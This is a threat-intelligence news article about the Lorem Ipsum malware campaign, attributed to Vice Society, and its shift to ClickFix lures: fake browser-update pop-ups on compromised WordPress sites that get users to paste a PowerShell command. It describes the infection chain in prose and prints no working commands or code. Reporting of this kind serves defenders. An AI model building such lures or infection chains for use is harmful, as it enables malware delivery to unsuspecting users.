Lorem Ipsum Malware Pivots to ClickFix Delivery After Microsoft Takedown
The Lorem Ipsum malware campaign, now linked to the Vice Society ransomware group, has shifted to ClickFix lures hosted on compromised WordPress sites after Microsoft disrupted its certificate supply.
The operators of the Lorem Ipsum shellcode loader and backdoor have abandoned their previous delivery method of Trojanized Microsoft Teams installers in favor of ClickFix social-engineering lures, according to new research from BlueVoyant. The shift occurred in late May 2026, just days after Microsoft dismantled the Fox Tempest (aka Forging Marauder) malware-signing-as-a-service infrastructure and revoked more than 1,000 fraudulently obtained Microsoft Trusted Signing certificates. While the takedown temporarily disrupted the threat actors, they quickly pivoted to a new and potentially more dangerous delivery model that eliminates code signing entirely.
BlueVoyant, which has tracked the Lorem Ipsum campaign since February 2026, now strongly believes the operation is linked to Rapid Brigantine, a financially motivated cybercriminal group also tracked as Vanilla Tempest, DEV-0832, and Vice Society. This group has been active since at least mid-2022 and is associated with multiple ransomware families including Rhysida, BlackCat, Zeppelin, and Quantum Locker. The connection is significant for defenders because it suggests the Lorem Ipsum campaign is part of a broader ransomware operation with a history of deploying destructive payloads against victims.
The new ClickFix delivery model uses at least five legitimate but compromised WordPress websites spanning multiple sectors including architecture, legal services, and construction technology. The attack chain begins when a user arrives at one of these websites, where an injected iframe displays a fake browser update notification claiming the user's browser is out of date. The pop-up instructs the user to paste a provided PowerShell command, disguised as a Microsoft Edge security intelligence update, into their Windows Terminal. Running that command silently downloads and executes the Lorem Ipsum malware in the background while displaying a fake success message.
The Lorem Ipsum campaign initially relied on SEO poisoning to lure users into downloading Trojanized Microsoft Teams installers signed with valid Microsoft Trusted Signing certificates. Victims who ran the fake installers unknowingly deployed a multistage shellcode loader and backdoor that gave the attackers a foothold on their systems. BlueVoyant's analysis found Lorem Ipsum using a sophisticated, multistage infection chain with DLL sideloading, encrypted payloads, and a command-and-control (C2) mechanism that abused the legitimate Indian blogging platform LetsDiskuss[.]com as a dead-drop to retrieve C2 server addresses.
BlueVoyant identified multiple indicators linking Lorem Ipsum to Rapid Brigantine, including a Microsoft report in October 2025 describing an SEO poisoning-driven Vanilla Tempest campaign involving Teams installers, the shared use of Forging Marauder/Fox Tempest for obtaining malware signing certificates, and a DFIR report where a Lorem Ipsum-associated loader delivered a backdoor associated with Rapid Brigantine. The pivot to ClickFix broadens the potential victim pool from users who encountered fake Microsoft Teams installers on SEO-poisoned and malvertised download portals to anyone browsing one of the compromised WordPress sites.
For defenders, the broader implication is that detection and prevention strategies cannot rely on assumptions about initial access vectors. Organizations need to anticipate fast-moving, multichannel delivery models that combine social engineering, legitimate web infrastructure abuse, and user execution of malicious commands. BlueVoyant emphasized that "defending against this ClickFix campaign and the broader Rapid Brigantine post-exploitation activity that typically follows requires prioritizing behavioral detections over static indicators, given the operators' demonstrated capacity for rapid pivot in response to disruption."
Newly published threat intelligence from Morphisec, BlueVoyant, and Huntress reveals that the broader ClickFix ecosystem has expanded beyond Lorem Ipsum to include two additional malware loaders — BabaDeda Loader and Potemkin. While the existing story focuses on Lorem Ipsum's pivot after Microsoft's takedown, the new reporting shows ClickFix campaigns now target education and financial organizations with a modular crypter framework capable of deploying DanaBot, SectopRAT, and information stealers through hidden PowerShell and DLL side-loading chains.